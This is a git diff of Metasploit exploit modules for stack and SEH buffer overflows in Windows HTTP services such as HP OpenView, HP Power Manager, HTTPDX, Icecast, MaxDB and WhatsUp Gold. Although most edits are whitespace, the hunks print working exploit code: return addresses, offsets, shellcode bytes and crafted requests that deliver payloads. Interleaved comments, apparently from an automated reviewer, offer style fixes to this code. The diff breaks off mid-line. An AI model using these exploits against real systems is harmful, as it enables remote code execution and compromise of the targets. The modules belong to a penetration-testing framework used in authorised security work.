@@ -14,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in HP OpenView Network Node Manager 7.50. @@ -41,15 +45,14 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll + [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 9 2009')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit @@ -63,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => "GET", 'data' => "Host=&Oid=#{sploit}&Community=&Action=&Context=Snmp", }, 3) - + handler end diff --git a/modules/exploits/windows/http/hp_nnm_toolbar.rb b/modules/exploits/windows/http/hp_nnm_toolbar.rb index 981c79a3b7..eb76ab990e 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -13,12 +17,12 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in HP OpenView Network Node Manager 7.50. - By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute - arbitrary code. + By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute + arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -41,15 +45,14 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll + [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 7 2009')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit @@ -62,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => "/OvCgi/Toolbar.exe?" + sploit, 'method' => "GET", }, 5) - + handler diff --git a/modules/exploits/windows/http/hp_power_manager_login.rb b/modules/exploits/windows/http/hp_power_manager_login.rb index 5581ca02d0..7c5ab67f0c 100644 --- a/modules/exploits/windows/http/hp_power_manager_login.rb +++ b/modules/exploits/windows/http/hp_power_manager_login.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -10,15 +14,15 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking - include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Hewlett-Packard Power Manager Administration Buffer Overflow.', 'Description' => %q{ This module exploits a stack overflow in Hewlett-Packard Power Manager 4.2. - Sending a specially crafted POST request with an overly long Login string, an - attacker may be able to execute arbitrary code. + Sending a specially crafted POST request with an overly long Login string, an + attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -40,15 +44,14 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 SP4 English', { 'Ret' => 0x75022ac4 } ], ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 4 2009')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit @@ -59,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit[635,4] = [target.ret].pack('V') sploit[639,32] = make_nops(32) sploit[671,payload.encoded.length] = payload.encoded - + data = "HtmlOnly=true&Login=" + sploit + "+passwd&Password=&loginButton=Submit+Login" req = "POST /goform/formLogin HTTP/1.1\r\n" @@ -71,9 +74,9 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") sock.put(req) - sleep(5) + sleep(5) handler disconnect - end - + end + end diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index fe18ccb421..55ae5a380b 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb 
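Review bot: `sleep(5)` between `sock.put(req)` and `handler` in `exploit` is a bare magic wait with no explanation; presumably it keeps the socket open long enough for the overflowed service to run the payload before `disconnect`, but nothing in the hunk says so. Add `sleep(5) # keep the connection up so the payload can run before we disconnect — TODO confirm the delay is needed`. The Login value is also spliced into the form body at `data = "HtmlOnly=true&Login=" + sploit + "+passwd&Password=&loginButton=Submit+Login"` without URL-encoding, so correctness depends on the module's BadChars (set outside this hunk) excluding `&`, `=`, `+` and `%`; a comment at the `data =` line recording that assumption would help the next maintainer. The start of `exploit` is outside this hunk.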
@@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## ## # httpdx_handlepeer.rb @@ -23,20 +27,20 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - + include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTPDX h_handlepeer() Function Buffer Overflow', 'Description' => %q{ - This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The + This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The vulnerability is caused due to a boundary error within the "h_handlepeer()" function in http.cpp. By sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code. }, 'Author' => - [ + [ 'Pankaj Kohli <pankaj208[at]gmail.com>', # Original exploit [see References] 'Trancer <mtrancer[at]gmail.com>', # Metasploit implementation 'jduck' 
@@ -63,17 +67,18 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', 'Targets' => - [ - [ 'httpdx 1.4 - Windows XP SP3 English', - { - 'Offset' => 476, - 'Ret' => 0x63b81a07, # seh handler (pop/pop/ret in n.dll) - 'Readable' => 0x63b80131 # early in n.dll - } - ] - ], + [ + [ 'httpdx 1.4 - Windows XP SP3 English', + { + 'Offset' => 476, + 'Ret' => 0x63b81a07, # seh handler (pop/pop/ret in n.dll) + 'Readable' => 0x63b80131 # early in n.dll + } + ] + ], 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( [ Opt::RPORT(80) ], self.class ) end def check @@ -82,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("GET / HTTP/1.0\r\n\r\n") resp = sock.get_once disconnect - + # this will need to be updated if httpdx is ever fixed :) if (resp and (m = resp.match(/Server: httpdx\/(.*) \(Win32\)/))) then print_status("HTTPDX version detected : #{m[1]}") @@ -95,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect - + uri = payload.encoded if target['Offset'] > payload_space pad = target['Offset'] - payload_space @@ -107,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote # extra causing hitting end of the stack uri << rand_text_alphanumeric(1024) uri[620,4] = [target['Readable']].pack('V') # arg (must be readable) - + sploit = rand_text(3) + "=" + uri request = "GET /" + sploit + " HTTP/1.1\r\n" # an empty host header gives us 512 bytes in the client structure @@ -123,5 +128,5 @@ class Metasploit3 < Msf::Exploit::Remote disconnect handler end - + end diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index 031292b14d..cd702c6ec3 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb 
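Review bot: In `check`, `if (resp and (m = resp.match(/Server: httpdx\/(.*) \(Win32\)/))) then` mixes the low-precedence control-flow operator `and` with an assignment inside the condition and puts `then` on a multi-line `if`, both of which RuboCop flags. Write it as `if resp && (m = resp.match(%r{Server: httpdx/(.*) \(Win32\)}))` and drop `then`; `%r{}` also removes the escaped slash. Consider `([\d.]+)` in place of the greedy `(.*)`, so the captured version that `print_status` reports is just the version token rather than anything up to the last ` (Win32)` on the line. The body of `check` continues outside this hunk.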
@@ -143,7 +143,7 @@ For now, that will have to be done manually. def exploit - # Use a copy of the target + # Use a copy of the target mytarget = target if (target['auto']) @@ -243,18 +243,6 @@ For now, that will have to be done manually. return nil end - def generate_ascii_sled(badchars) - sled = "" - (0..255).each do |ch| - str = [ch].pack('C') - if badchars.include?(str) - sled << "A" - else - sled << str - end - end - return sled - end end diff --git a/modules/exploits/windows/http/ia_webmail.rb b/modules/exploits/windows/http/ia_webmail.rb index a3eeb29b70..cdb8ebecfc 100644 --- a/modules/exploits/windows/http/ia_webmail.rb +++ b/modules/exploits/windows/http/ia_webmail.rb @@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IA WebMail 3.x Buffer Overflow', 'Description' => %q{ - This exploits a stack overflow in the IA WebMail server. + This exploits a stack overflow in the IA WebMail server. This exploit has not been tested against a live system at this time. - }, 'Author' => [ 'hdm' ], 'Version' => '$Revision$', @@ -35,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '2757'], [ 'BID', '8965'], [ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'], - ], 'Privileged' => false, 'Payload' => 
@@ -43,11 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1024, 'DisableNops' => true, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", - }, 'Platform' => 'win', - 'Targets' => - [ + 'Targets' => + [ [ 'IA WebMail 3.x', { @@ -64,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending request...") send_request_raw({ - 'uri' => + 'uri' => "/" + ("o" * target['Length']) + "META" + [target.ret].pack('V') + diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index 6fd3169509..6c6508d1ae 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -7,17 +11,16 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow', 'Description' => %q{ - This is a stack overflow exploit for IBM Tivoli Provisioning Manager + This is a stack overflow exploit for IBM Tivoli Provisioning Manager for OS Deployment version 5.1.0.X. }, 'Author' => 'toto', @@ -39,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 0x200, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a", - 'Prepend' => + 'Prepend' => # Disable NX on 2k3 to upload data on the stack # (service crashes if the stack is switched to the heap) "\x64\x8b\x0d\x30\x00\x00\x00" + # mov ecx, dword ptr fs:[0x30] ; PEB 
@@ -61,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['TPMfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }], # tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll) @@ -69,12 +72,12 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'May 02 2007', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(443), - OptBool.new('SSL', [true, 'Use SSL', true]), - ], self.class ) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + ], self.class ) end def exploit @@ -129,10 +132,10 @@ class Metasploit3 < Msf::Exploit::Remote # ret 4: (increase the stack pointer to allow a jump back in the payload) # add esp, 1ch - # retn + # retn auth[ 2160, 4 ] = [ ib + 0x11da ].pack('V') - auth[ 2184, 2 ] = "\xeb\x56" # jmp payload + auth[ 2184, 2 ] = "\xeb\x56" # jmp payload # ret 5: (create an executable heap - huge one) @@ -217,12 +220,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'uri' => '/', 'method' => 'GET', - 'headers' => + 'headers' => { 'Authorization' => "Basic #{auth}" } }, 5) - + handler end diff --git a/modules/exploits/windows/http/ibm_tsm_cad_header.rb b/modules/exploits/windows/http/ibm_tsm_cad_header.rb index af3fe02674..983a8bc709 100644 --- a/modules/exploits/windows/http/ibm_tsm_cad_header.rb +++ b/modules/exploits/windows/http/ibm_tsm_cad_header.rb 
@@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3). + This module exploits a stack overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3). By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code. }, 'Author' => [ 'MC' ], @@ -46,28 +44,27 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'IBM Tivoli Storage Manager Express 5.3.3', { 'Ret' => 0x0289fbe3 } ], # dbghelp.dll ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Sept 24 2007')) - - register_options( [ Opt::RPORT(1581) ], self.class ) + register_options( [ Opt::RPORT(1581) ], self.class ) end def exploit connect - + sploit = "GET /BACLIENT HTTP/1.1\r\n" - sploit << "Host: 127.0.0.1 " + rand_text_alpha_upper(190) - sploit << [target.ret].pack('V') + payload.encoded - + sploit << "Host: 127.0.0.1 " + rand_text_alpha_upper(190) + sploit << [target.ret].pack('V') + payload.encoded + print_status("Trying target %s..." % target.name) - + sock.put(sploit + "\r\n\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index 64fd084afe..ee09b0796e 100644 
--- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Icecast (<= 2.0.1) Header Overwrite (win32)', 'Description' => %q{ - This module exploits a buffer overflow in the header parsing + This module exploits a buffer overflow in the header parsing of icecast, discovered by Luigi Auriemma. Sending 32 HTTP headers will cause a write one past the end of a pointer array. On win32 this happens to overwrite the saved @@ -36,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote exits, the counter will be left incremented, and eventually the threadpool limit will be maxed. So you can multihit, but only till you fill the threadpool. - + }, 'Author' => [ 'spoonm', 'Luigi Auriemma <aluigi@autistici.org>' ], 'License' => MSF_LICENSE, @@ -47,10 +45,9 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '10406'], [ 'BID', '11271'], [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html'], - ], 'Privileged' => false, - 'DefaultOptions' => + 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 
@@ -62,17 +59,17 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Automatic', { }], ], 'DisclosureDate' => 'Sep 28 2004', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(8000) - ], self.class) + + register_options( + [ + Opt::RPORT(8000) + ], self.class) end # Interesting that ebp is pushed after the local variables, and the line array @@ -85,16 +82,16 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect - + # bounce bounce bouncey bounce.. (our chunk gets free'd, so do a little dance) - # jmp 12 + # jmp 12 evul = "\xeb\x0c / HTTP/1.1 #{payload.encoded}\r\n" evul << "Accept: text/html\r\n" * 31; - + # jmp [esp+4] evul << "\xff\x64\x24\x04\r\n" evul << "\r\n" - + sock.put(evul) handler diff --git a/modules/exploits/windows/http/intersystems_cache.rb b/modules/exploits/windows/http/intersystems_cache.rb index 678360e3f5..226bdc9577 100644 --- a/modules/exploits/windows/http/intersystems_cache.rb +++ b/modules/exploits/windows/http/intersystems_cache.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -13,12 +17,12 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in InterSystems Cache 2009.1. - By sending a specially crafted GET request, an attacker may be able to execute - arbitrary code. + By sending a specially crafted GET request, an attacker may be able to execute + arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -40,15 +44,14 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 SP4 English', { 'Offset' => 710, 'Ret' => 0x6ff2791a } ], # libhttpd.dll 2.2.11.0 / pop ebp | pop ebx | ret ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 29 2009')) # Initially...! - - register_options( [ Opt::RPORT(57772) ], self.class ) + register_options( [ Opt::RPORT(57772) ], self.class ) end def exploit @@ -69,5 +72,5 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) handler - end + end end diff --git a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb index b674831d2c..e615dde73b 100644 --- a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb +++ b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb 
@@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By - posting a long string for the value of 'instancename' in the _maincfgret.cgi + This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By + posting a long string for the value of 'instancename' in the _maincfgret.cgi script an attacker can overflow a buffer and execute arbitrary code on the system. }, 'Author' => [ 'MC' ], 
@@ -47,27 +45,27 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 25 2004')) - - register_options( [ - Opt::RPORT(80), - OptString.new('HTTPUSER', [ false, 'The username to authenticate as', 'admin']), - OptString.new('HTTPPASS', [ false, 'The password to authenticate as', 'admin']), - ], self.class ) + register_options( + [ + Opt::RPORT(80), + OptString.new('HTTPUSER', [ false, 'The username to authenticate as', 'admin']), + OptString.new('HTTPPASS', [ false, 'The password to authenticate as', 'admin']), + ], self.class ) end def exploit c = connect - num = rand(65535).to_s - user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}" - + num = rand(65535).to_s + user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}" + req = "page=notify&origname=&action=return&type=Beeper&instancename=" req << rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06" req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded @@ -79,12 +77,12 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST', 'content-type' => 'application/x-www-form-urlencoded', 'data' => req, - 'headers' => + 'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}" } }, 5) - + handler end diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 068b331406..3408d475a5 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb 
@@ -3,29 +3,27 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MailEnable Authorization Header Buffer Overflow', 'Description' => %q{ - This module exploits a remote buffer overflow in the MailEnable web service. - The vulnerability is triggered when a large value is placed into the Authorization - header of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and - MailEnable Professional versions prior to 1.55 are affected. + This module exploits a remote buffer overflow in the MailEnable web service. + The vulnerability is triggered when a large value is placed into the Authorization + header of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and + MailEnable Professional versions prior to 1.55 are affected. }, 'Author' => 'David Maciejak <david.maciejak[at]kyxar.fr>', 'License' => MSF_LICENSE, @@ -44,10 +42,10 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x0d\x0a" }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['MEHTTPS.exe Universal', { 'Ret' => 0x006c36b7 }], # mehttps.exe - ], + ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 24 2005')) end @@ -55,12 +53,12 @@ class Metasploit3 < Msf::Exploit::Remote def check response = send_request_raw - if response and - response['Server'] and + if response and + response['Server'] and response['Server'] =~ /.*MailEnable/ return Exploit::CheckCode::Appears end - + return Exploit::CheckCode::Safe end 
diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index b93097ae39..53b1de2225 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -3,31 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MaxDB WebDBM Database Parameter Overflow', 'Description' => %q{ - This module exploits a stack overflow in the MaxDB WebDBM + This module exploits a stack overflow in the MaxDB WebDBM service. By sending a specially-crafted HTTP request that contains - an overly long database name. A remote attacker could overflow a buffer + an overly long database name. A remote attacker could overflow a buffer and execute arbitrary code on the system with privileges of the wahttp process. - This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27. + This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -51,16 +49,15 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'MaxDB 7.6.00.16', { 'Ret' => 0x1005a08f } ], # wapi.dll [ 'MaxDB 7.6.00.27', { 'Ret' => 0x1005b08f } ], # wapi.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 29 2006')) - - register_options( [ Opt::RPORT(9999) ], self.class ) + register_options( [ Opt::RPORT(9999) ], self.class ) end def exploit 
@@ -77,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote req = "Event=DBM_LOGON&Action=LOGON&Server=#{server}&Database=#{sploit}" req << "&User=#{user}&Password=#{pass}" - res = "POST /webdbm HTTP/1.1\r\n" + "Host: #{rhost}:#{port}\r\n" + res = "POST /webdbm HTTP/1.1\r\n" + "Host: #{rhost}:#{port}\r\n" res << "Content-Length: #{req.length}" + "\r\n\r\n" + req + "\r\n" print_status("Trying target %s..." % target.name) diff --git a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb index 341f87a665..a3af2be03c 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MaxDB WebDBM GET Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the MaxDB WebDBM + This module exploits a stack overflow in the MaxDB WebDBM service. This service is included with many recent versions of the MaxDB and SAPDB products. This particular module is capable of exploiting Windows systems through the use of an @@ -31,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote assumes a web root path with the same length as: C:\Program Files\sdb\programs\web\Documents - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 
@@ -39,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2005-0684'], - [ 'OSVDB', '15816'], + [ 'OSVDB', '15816'], [ 'URL', 'http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities'], [ 'BID', '13368'], ], @@ -49,10 +46,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 2052, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['MaxDB 7.5.00.11 / 7.5.00.24', { 'Ret' => 0x1002aa19 }], # wapi.dll ['Windows 2000 English', { 'Ret' => 0x75022ac4 }], # ws2help.dll @@ -62,11 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Apr 26 2005', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(9999) - ], self.class) + + register_options( + [ + Opt::RPORT(9999) + ], self.class) end def exploit @@ -80,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote buf[3647, 4] = [target.ret].pack('V') print_status("Trying target address 0x%.8x..." % 